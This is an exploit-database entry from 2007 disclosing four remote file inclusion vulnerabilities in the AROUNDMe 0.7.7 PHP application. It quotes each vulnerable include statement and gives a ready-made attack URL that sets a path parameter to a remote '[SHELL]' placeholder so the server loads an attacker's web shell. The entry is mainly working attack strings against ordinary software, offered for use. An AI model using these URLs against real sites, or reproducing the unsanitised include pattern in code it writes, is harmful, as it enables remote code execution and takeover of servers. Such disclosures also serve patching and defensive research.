AROUNDMe 0.7.7 Multiple Remote File Inclusion Vulnerabilities

2007-04-04T00:00:00
ID 1337DAY-ID-1703
Type zdt
Reporter kezzap66345
Modified 2007-04-04T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================================================
AROUNDMe 0.7.7 Multiple Remote File Inclusion Vulnerabilities
=============================================================




AROUNDMe  _0_7_7
*****************
Found by kezzap66345 *
*****************
*****************
ERROR#1:
File:\components\core\inc\core_profile.header.php
*****************


include_once($language_path_core . 'inc/me_common.inc.php');     <<< rfi coded


**************************************************************************************
RFI#1:

http://SITE.com/path/aroundme/components/core/inc/core_profile.header.php?language_path_core=[SHELL]


**************************************************************************************

*****************
ERROR#2:
File:/components/core/template/barnraiser_01/maint_contact_view.tpl.php
*****************

<?php
                       include $template_path_core . "inc/comment.inc.php";
                       ?> <<< rfi coded


**************************************************************************************
RFI#2:
http://SITE.com/path/components/core/template/barnraiser_01/maint_contact_view.tpl.php?template_path_core=[SHELL]




ERROR#3:
File:/components/core/template/barnraiser_01/default.tpl.php
*****************


include_once($template_path . "inc/menu_" . $section . ".inc.php");    <<< rfi coded


**************************************************************************************
RFI#3:

http://SITE.com/path/components/core/template/barnraiser_01/default.tpl.php?template_path=[SHELL]


**************************************************************************************

*****************
ERROR#4:
File:/components/core/template/barnraiser_01/maint_contact_view.tpl.php
*****************
include($template_path_core . "inc/form_gui_html_editor.inc.php");    <<<
rfi coded


**************************************************************************************
RFI#4:

http://SITE.com/path/components/core/template/barnraiser_01/maint_contact_view.tpl.php?template_path_core=[SHELL]
Thanks:Siircicocuk and x0r0n
**************************************************************************************
**************************************************************************************
**************************************************************************************
**************************************************************************************
******Thanx****SiiRCiCOCUK************************************************************



#  0day.today [2018-04-08]  #